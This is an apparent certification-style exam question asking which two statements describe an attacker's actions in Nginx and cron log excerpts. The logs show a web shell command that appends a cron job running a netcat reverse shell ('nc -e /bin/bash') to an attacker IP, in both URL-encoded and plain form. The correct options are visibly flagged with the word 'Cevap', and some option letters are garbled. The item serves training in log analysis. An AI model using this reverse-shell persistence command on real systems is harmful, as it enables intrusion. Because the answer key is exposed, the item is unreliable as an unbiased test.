A security operations analyst is investigating correlated SIEM log entries recorded from a Linux-based web server. The log management repository captured the following chronological event logs:
[Nginx Web Access Log]
192.168.10.45 - - [27/Jul/2026:11:14:02 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 4522
192.168.10.45 - - [27/Jul/2026:11:14:15 +0000] "GET /uploads/avatar.php?cmd=whoami HTTP/1.1" 200 34
192.168.10.45 - - [27/Jul/2026:11:14:28 +0000] "GET /uploads/avatar.php?cmd=echo+%22%2A%2F5+%2A+%2A+%2A+%2A+root+nc+-e+%2Fbin%2Fbash+192.168.10.45+4444%22+%3E%3E+%2Fetc%2Fcrontab HTTP/1.1" 200 12
[Syslog / Cron Execution Log]
Jul 27 11:15:01 webserver CRON[4821]: (root) CMD (nc -e /bin/bash 192.168.10.45 4444)
Based on the log data, which of the following statements accurately describe the actions performed by the threat actor? (Select TWO.)
- The adversary leveraged a web shell payload uploaded to the web server directory to execute arbitrary system commands.Cevap
- The adversary established system persistence by appending a malicious scheduled task (cron job) that initiates an outbound reverse shell.Cevap
- CThe attack represents a Cross-Site Scripting (XSS) exploit targeting client-side browser session state.
- DThe incident indicates a database SQL injection flaw where backend database tables were compromised via unvalidated authentication parameters.